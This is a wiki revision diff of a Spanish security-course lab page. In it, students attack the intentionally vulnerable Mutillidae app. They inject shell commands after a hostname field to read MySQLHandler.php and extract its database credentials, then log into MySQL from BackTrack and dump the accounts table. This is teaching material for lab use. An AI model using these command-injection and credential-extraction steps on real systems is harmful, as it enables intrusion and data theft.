Seguridad y Alta Disponibilidad

Herramientas de usuario

Herramientas del sitio

Traza: p1
sad:fedora14:p2

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión		Revisión previa
sad:fedora14:p2 [2018/01/24 15:32] José Manuel Guallarsad:fedora14:p2 [2019/01/04 13:18] (actual) – editor externo 127.0.0.1
Línea 157: Línea 157:
 Hemos hecho parte del trabajo, porque ahora tenemos la contraseña "samurai", que está en el fichero MYSQLHandler.php  pero no sabemos el usuario que utiliza esa contraseña, por lo que  vamos a buscar en MySQLHandler.php las palabras usuario (user) o login Hemos hecho parte del trabajo, porque ahora tenemos la contraseña "samurai", que está en el fichero MYSQLHandler.php  pero no sabemos el usuario que utiliza esa contraseña, por lo que  vamos a buscar en MySQLHandler.php las palabras usuario (user) o login
  
 +<code bash>
 www.colegiomontessori.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "=" www.colegiomontessori.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="
 +</code>
  
 {{:sad:fedora:p2:13.png?500|}} {{:sad:fedora:p2:13.png?500|}}
Línea 163: Línea 165:
 Nos da mucha información, por un lado nos dice que el usuario es root y por otro lado como php se conecta y autentifica con MySQL, eso lo podemos ver en las lisneas $this->mMySQLConnection _... Nos da mucha información, por un lado nos dice que el usuario es root y por otro lado como php se conecta y autentifica con MySQL, eso lo podemos ver en las lisneas $this->mMySQLConnection _...
  
-Mostrar MySQLHandler.php+**Mostrar MySQLHandler.php**
  
 Creo que podría haberte mostrado esto primero, pero las cosas buenas llegan a los que esperan. Creo que podría haberte mostrado esto primero, pero las cosas buenas llegan a los que esperan.
  
-Es posible visualizar los contenidos del programa MySQLHandler.php, codificando las etiquetas "<? Php" y "?>". Estas etiquetas le dicen a Apache que ejecute un script php. +Es posible visualizar los contenidos del programa** MySQLHandler.php**, codificando las etiquetas "<? Php" y "?>". Estas etiquetas le dicen a Apache que ejecute un script php. 
  
 Para evitar este problema y simplemente mostrar el texto del programa, cambiamos "<" a "& # 60;" y ">" a "& # 62;". Para evitar este problema y simplemente mostrar el texto del programa, cambiamos "<" a "& # 60;" y ">" a "& # 62;".
 +<code bash>
 www.colegiomontessor.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g' www.colegiomontessor.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
 +</code>
  
 {{:sad:fedora:p2:14.png?500|}} {{:sad:fedora:p2:14.png?500|}}
Línea 177: Línea 180:
 Aqui sacamos mucha mucha información LOLLOL por un lado "root" el usuario de la base de datos, por otro lado "samurai" la contraseña de la base de datos y por ultimo "nowasp" el nombre de la base de datos Aqui sacamos mucha mucha información LOLLOL por un lado "root" el usuario de la base de datos, por otro lado "samurai" la contraseña de la base de datos y por ultimo "nowasp" el nombre de la base de datos
  
 +<code mysql>
     static public $mMySQLDatabaseUsername = "root";     static public $mMySQLDatabaseUsername = "root";
  
Línea 183: Línea 186:
  
     static public $mMySQLDatabaseName = "nowasp";     static public $mMySQLDatabaseName = "nowasp";
 +</code>
  
-Ahora podemos ir al terminal de nuestro Backtrack+Ahora podemos ir al terminal de nuestro **Backtrack**
  
 +<code bash>
 root@bt:~# mysql -h 192.168.153.39 -uroot -psamurai root@bt:~# mysql -h 192.168.153.39 -uroot -psamurai
 mysql> show databases; mysql> show databases;
 mysql> use nowasp; mysql> use nowasp;
 +</code>
 {{:sad:fedora:p2:15.png?500|}} {{:sad:fedora:p2:15.png?500|}}
  
-Ahora vamos a nevegar por la tablas+====== A nevegar por la tablas ====== 
  
 Basicamente vamos a mirar que tablas contienen información del usuario y de la contraseña Basicamente vamos a mirar que tablas contienen información del usuario y de la contraseña
Línea 198: Línea 204:
 {{:sad:fedora:p2:16.png?500|}} {{:sad:fedora:p2:16.png?500|}}
  
 +<code mysql>
 mysql> select * from accounts; mysql> select * from accounts;
 mysql> quit; mysql> quit;
 +</code>
  
 {{:sad:fedora:p2:17.png?500|}} {{:sad:fedora:p2:17.png?500|}}
 +
  
 **''Print de pantalla a entregar''** **''Print de pantalla a entregar''**
sad/fedora14/p2.1516807960.txt.gz · Última modificación: (editor externo)